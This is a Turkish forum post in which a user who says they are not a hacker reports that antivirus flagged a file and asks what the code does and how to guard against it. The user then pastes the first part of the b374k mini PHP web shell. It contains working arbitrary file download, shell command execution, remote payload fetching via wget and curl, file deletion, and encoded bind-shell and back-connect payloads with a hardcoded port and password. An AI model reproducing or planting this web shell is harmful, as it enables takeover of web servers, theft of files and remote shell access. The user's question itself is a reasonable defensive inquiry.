Tekil Mesaj gösterimi - Php Shell

Konu Php Shell

22-05-2014, 11:21:10

#1

S_HA_DO_W

Merhaba arkadaşlar,
Hack işleri ile uğraşan birisi değilim.
harddisk taraması yaparken antivirüs programı bir dosyada sorun var dedi ve incelediğimde shell tarzı birşeydi sanırım. anlamadığım için sizden bilgi isteyeyim dedim.

zararlı kodların olduğu siteyi ne zaman kullandım ne için kullandım hiç hatırlamıyorum (çok site elimden geçiyor.)
kodlar ile hangi bilgilere ulaşabiliyor, bu tarz bir sorun yaşamamak için ne gibi önlem almam gerekiyor diye kodları inceleyeyim dedim fakat antivirüs programı kaydetmeme bile izin vermedi
antivirüsü kapatıp iş yapmayıda göze alamadım açıkcası. çünkü bilgisayarda çok fazla yedek, bilgi vs var.

aşağıdaki kodlar ile ne gibi bilgilere ulaşılmıştır?
bu tarz bir kodun çalışmaması için neler gerekir?

kodlar tek mesaja sığmadığı için parça parça atacağım

Parça 1:

<?php

if(isset($_GET['dl']) && ($_GET['dl'] != "")){
$file = $_GET['dl'];

$filez = @file_get_contents($file);

header("Content-type: application/octet-stream");

header("Content-length: ".strlen($filez));

header("Content-disposition: attachment; filename=\"".basename($file)."\";");
echo $filez;
exit;
}elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
$file = $_GET['dlgzip'];
$filez = gzencode(@file_get_contents($file));
header("Content-Type:application/x-gzip\n");
header("Content-length: ".strlen($filez));
header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
echo $filez;
exit;
}
if(isset($_GET['img'])){
@ob_clean();
$d = magicboom($_GET['y']);
$f = $_GET['img'];
$inf = @getimagesize($d.$f);
$ext = explode($f,".");
$ext = $ext[count($ext)-1];
@header("Content-type: ".$inf["mime"]);
@header("Cache-control: public");
@header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
@header("Cache-control: max-age=".(60*60*24*7));
@readfile($d.$f);
exit;
}
$ver = "1.01";
$software = getenv("SERVER_SOFTWARE");

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE;
else $safemode = FALSE;

$system = @php_uname();

if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
else $win = FALSE;

if(isset($_GET['y'])){
if(@is_dir($_GET['view'])){
$pwd = $_GET['view'];
@chdir($pwd);
}else{
$pwd = $_GET['y'];
@chdir($pwd);
}
}
if(!$win){
if(!$user = rapih(exe("whoami"))) $user = "";
if(!$id = rapih(exe("id"))) $id = "";
$prompt = $user." \$ ";
$pwd = @getcwd().DIRECTORY_SEPARATOR;
}else{
$user = @get_current_user();
$id = $user;
$prompt = $user." >";
$pwd = realpath(".")."\\";
$v = explode("\\",$d);
$v = $v[0];
foreach (range("A","Z") as $letter) {
$bool = @is_dir($letter.":\\");
if ($bool) {
$letters .= "<a href=\"?y=".$letter.":\\\">[ ";
if ($letter.":" != $v) {
$letters .= $letter;
}else{
$letters .= "<span class=\"gaya\">".$letter."</span>";
}
$letters .= " ]</a> ";
}
}
}
if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
else $posix = FALSE;
$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
$my_ip = $_SERVER['REMOTE_ADDR'];
$bindport = "13123";
$bindport_pass = "b374k";
$pwds = explode(DIRECTORY_SEPARATOR,$pwd);
$pwdurl = "";
for($i = 0 ;$i < sizeof($pwds)-1 ;$i++){
$pathz = "";
for($j = 0 ;$j <= $i ; $j++){
$pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
}
$pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
}
if(isset($_POST['rename'])){
$old = $_POST['oldname'];
$new = $_POST['newname'];
@rename($pwd.$old,$pwd.$new);
$file = $pwd.$new;
}
$buff = $software."<br />";
$buff .= $system."<br />";
if($id != "") $buff .= $id."<br />";
$buff .= "server ip : ".$server_ip." <span class=\"gaya\">|</span> your ip : ".$my_ip."<br />";
if($safemode) $buff .= "safemode <span class=\"gaya\">ON</span><br />";
else $buff .= "safemode <span class=\"gaya\">OFF<span><br />";
$buff .= $letters."*>*".$pwdurl;

function rapih($text){
return trim(str_replace("<br />","",$text));
}
function magicboom($text){
if (!get_magic_quotes_gpc()) {
return $text;
}
return stripslashes($text);
}
function showdir($pwd,$prompt){
$fname = array();
$dname = array();
if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
else $posix = FALSE;
$user = "????:????";
if($dh = opendir($pwd)){
while($file = readdir($dh)){
if(is_dir($file)){
$dname[] = $file;
}elseif(is_file($file)){
$fname[] = $file;
}
}
closedir($dh);
}
sort($fname);
sort($dname);
$path = @explode(DIRECTORY_SEPARATOR,$pwd);
$tree = @sizeof($path);
$parent = "";
$buff = " <form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\"> <table class=\"cmdbox\" style=\"width:50%;\">
<tr><td>$prompt</td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" />
<input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form>
<form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
<tr><td>view file/folder</td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" />
<input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form>
</table><table class=\"explore\"> <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th>
<th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr> ";
if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
else $parent = $pwd;
foreach($dname as $folder){
if($folder == ".") {
if(!$win && $posix){
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}else{
$owner = $user;
}
$buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td>
<td>".get_perms($pwd)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td>
<span id=\"titik1\"><a href=\"?y=$pwd&edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\" >newfolder</a>
</span> <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form></td></tr> ";
}elseif($folder == "..") {
if(!$win && $posix){
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}else{
$owner = $user;
}
$buff .= "<tr><td><a href=\"?y=".$parent."\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td>
<td>".get_perms($parent)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td><td>
<span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">newfi le</a> | <a href=\"javascript:tukar('titik2','titik2_form');\" >newfolder</a>
</span> <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form> </td></tr>";
}else{
if(!$win && $posix){
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}else{
$owner = $user;
}
$buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a>
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','". clearspace($folder)."_link');\" /> </form>
<td>DIR</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd.$folder)."</td>
<td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_l ink','".clearspace($folder)."_form');\">rename</a>
| <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">delete</a></td></tr>";
}
}
foreach($fname as $file){
$full = $pwd.$file;
if(!$win && $posix){
$name=@posix_getpwuid(@fileowner($file));
$group=@posix_getgrgid(@filegroup($file));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}else{
$owner = $user;
}
$buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\">$file</a>
<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
<input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".cl earspace($file)."_form');\" />
</form> </td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td>
<td>".get_perms($full)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td> <td><a href=\"?y=$pwd&edit=$full\">edit</a>
| <a href=\"javascript:tukar('".clearspace($file)."_lin k','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$full\">delete</a> |
<a href=\"?y=$pwd&dl=$full\">download</a>*(<a href=\"?y=$pwd&dlgzip=$full\">gzip</a>)</td></tr>";
}
$buff .= "</table>";
return $buff;
}
function ukuran($file){
if($size = @filesize($file)){
if($size <= 1024) return $size;
else{
if($size <= 1024*1024) {
$size = @round($size / 1024,2);
return "$size kb";
}else{
$size = @round($size / 1024 / 1024,2);
return "$size mb";
}
}
}else return "???";
}
function exe($cmd){
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
}elseif(function_exists('exec')){
@exec($cmd,$results);
$buff = "";
foreach($results as $result){
$buff .= $result;
}
return $buff;
}elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
}elseif(function_exists('shell_exec')){
$buff = @shell_exec($cmd);
return $buff;
}
}
function tulis($file,$text){
$textz = gzinflate(base64_decode($text));
if($filez = @fopen($file,"w")) {
@fputs($filez,$textz);
@fclose($file);
}
}
function ambil($link,$file) {
if($fp = @fopen($link,"r")){
while(!feof($fp)) {
$cont.= @fread($fp,1024);
}
@fclose($fp);
$fp2 = @fopen($file,"w");
@fwrite($fp2,$cont);
@fclose($fp2);
}
}
function which($pr){
$path = exe("which $pr");
if(!empty($path)) {
return trim($path);
}else{
return trim($pr);
}
}
function download($cmd,$url){
$namafile = basename($url);
switch($cmd) {
case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);
break;
case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);
break;
case 'wfread' : ambil($wurl,$namafile);
break;
case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);
break;
case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);
break;
case 'wget' : exe(which('GET')." ".$url." > ".$namafile);
break;
case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);
break;
default: break;
}
return $namafile;
}
function get_perms($file){
if($mode=@fileperms($file)){
$perms='';
$perms .= ($mode & 00400) ? 'r' : '-';
$perms .= ($mode & 00200) ? 'w' : '-';
$perms .= ($mode & 00100) ? 'x' : '-';
$perms .= ($mode & 00040) ? 'r' : '-';
$perms .= ($mode & 00020) ? 'w' : '-';
$perms .= ($mode & 00010) ? 'x' : '-';
$perms .= ($mode & 00004) ? 'r' : '-';
$perms .= ($mode & 00002) ? 'w' : '-';
$perms .= ($mode & 00001) ? 'x' : '-';
return $perms;
}else return "??????????";
}
function clearspace($text){
return str_replace(" ","_",$text);
}
$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW 6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9o SQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepct ruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9 OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07 AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z 5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+ Uf";
$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwc CAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTsz O7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3im YoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKN w8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnh kBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQ McR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw ==";
?>
<html>
<head>
<title>:: b374k m1n1 <?php echo $ver;?> ::</title>
<script type="text/javascript">
function tukar(lama,baru){
document.getElementById(lama).style.display = 'none';
document.getElementById(baru).style.display = 'block';
}
</script>
<style type="text/css">
body{ background:#000000;}
a{text-decoration:none;}
a:hover{border-bottom:1px solid #4C83AF;}
*{ font-size:11px;font-family:Tahoma,Verdana,Arial;color:#FFFFFF;}
#menu{ background:#111111;margin:8px 2px 4px 2px;}
#menu a{ padding:4px 18px;margin:0;background:#222222;text-decoration:none;letter-spacing:2px;}
#menu a:hover{ background:#191919;border-bottom:1px solid #333333;border-top:1px solid #333333;}
.tabnet{ margin:15px auto 0 auto;border: 1px solid #333333;}
.main { width:100%;}
.gaya { color: #4C83AF;}
.inputz{ background:#111111;border:0;padding:2px;border-bottom:1px solid #222222;border-top:1px solid #222222;}
.inputzbut{ background:#111111;color:#4C83AF;margin:0 4px;border:1px solid #444444;}
.inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF;border-top:1px solid #4C83AF;}
.output { margin:auto;border:1px solid #4C83AF;width:100%;height:400px;background:#000000 ;padding:0 2px;}
.cmdbox{ width:100%;}
.head_info{ padding: 0 4px;}
.b1{ font-size:30px;padding:0;color:#444444;}
.b2{ font-size:30px;padding:0;color: #333333;}
.b_tbl{ text-align:center;margin:0 4px 0 0;padding:0 4px 0 0;border-right:1px solid #333333;}
.phpinfo table{ width:100%;padding:0 0 0 0;}
.phpinfo td{ background:#111111;color:#cccccc;padding:6px 8px;}
.phpinfo th, th{ background:#191919;border-bottom:1px solid #333333;font-weight:normal;}
.phpinfo h2, .phpinfo h2 a{ text-align:center;font-size:16px;padding:0;margin:30px 0 0 0;background:#222222;padding:4px 0;}
.explore{ width:100%;}
.explore a { text-decoration:none;}
.explore td{ border-bottom:1px solid #333333;padding:0 8px;line-height:24px;}
.explore th{ padding:3px 8px;font-weight:normal;}
.explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF;}
.explore tr:hover{ background:#111111;}
.viewfile{ background:#EDECEB;color:#000000;margin:4px 2px;padding:8px;}
.sembunyi{ display:none;padding:0;margin:0;}
</style>
</head>